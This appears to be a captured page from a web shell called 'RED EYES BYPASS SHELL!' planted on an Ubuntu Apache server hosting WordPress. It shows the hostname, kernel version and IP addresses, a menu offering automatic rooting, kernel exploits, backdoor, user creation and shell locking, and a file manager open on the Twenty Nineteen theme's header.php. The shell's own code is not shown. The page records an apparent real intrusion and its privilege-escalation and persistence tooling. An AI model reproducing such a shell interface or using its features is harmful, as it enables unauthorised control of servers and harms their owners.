Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
twentynineteen /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
classes
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
sass
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
846
B
-rwxr-xr-x
archive.php
1.21
KB
-rwxr-xr-x
comments.php
3.98
KB
-rwxr-xr-x
contributing.txt
1.2
KB
-rwxr-xr-x
footer.php
1.58
KB
-rwxr-xr-x
functions.php
11.42
KB
-rwxr-xr-x
header.php
1.9
KB
-rwxr-xr-x
image.php
2.92
KB
-rwxr-xr-x
index.php
1.04
KB
-rwxr-xr-x
package-lock.json
247.15
KB
-rwxr-xr-x
package.json
1.58
KB
-rwxr-xr-x
page.php
766
B
-rwxr-xr-x
postcss.config.js
255
B
-rwxr-xr-x
print.css
4.05
KB
-rwxr-xr-x
print.scss
3.36
KB
-rwxr-xr-x
readme.txt
5.44
KB
-rwxr-xr-x
screenshot.png
171.15
KB
-rwxr-xr-x
search.php
1.33
KB
-rwxr-xr-x
single.php
1.81
KB
-rwxr-xr-x
style-editor-customizer.css
159
B
-rwxr-xr-x
style-editor-customizer.scss
158
B
-rwxr-xr-x
style-editor.css
80.52
KB
-rwxr-xr-x
style-editor.scss
19.59
KB
-rwxr-xr-x
style-rtl.css
222.74
KB
-rwxr-xr-x
style.css
222.93
KB
-rwxr-xr-x
style.css.map
15.35
KB
-rwxr-xr-x
style.scss
3.18
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The header for our theme * * This is the template that displays all of the <head> section and everything up until <div id="content"> * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package WordPress * @subpackage Twenty_Nineteen * @since Twenty Nineteen 1.0 */ ?><!doctype html> <html <?php language_attributes(); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?>" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="profile" href="https://gmpg.org/xfn/11" /> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php wp_body_open(); ?> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content"> <?php /* translators: Hidden accessibility text. */ _e( 'Skip to content', 'twentynineteen' ); ?> </a> <header id="masthead" class="<?php echo is_singular() && twentynineteen_can_show_post_thumbnail() ? 'site-header featured-image' : 'site-header'; ?>"> <div class="site-branding-container"> <?php get_template_part( 'template-parts/header/site', 'branding' ); ?> </div><!-- .site-branding-container --> <?php if ( is_singular() && twentynineteen_can_show_post_thumbnail() ) : ?> <div class="site-featured-image"> <?php twentynineteen_post_thumbnail(); the_post(); $discussion = ! is_page() && twentynineteen_can_show_post_thumbnail() ? twentynineteen_get_discussion_data() : null; $classes = 'entry-header'; if ( ! empty( $discussion ) && absint( $discussion->responses ) > 0 ) { $classes = 'entry-header has-discussion'; } ?> <div class="<?php echo $classes; ?>"> <?php get_template_part( 'template-parts/header/entry', 'header' ); ?> </div><!-- .entry-header --> <?php rewind_posts(); ?> </div> <?php endif; ?> </header><!-- #masthead --> <div id="content" class="site-content">
Close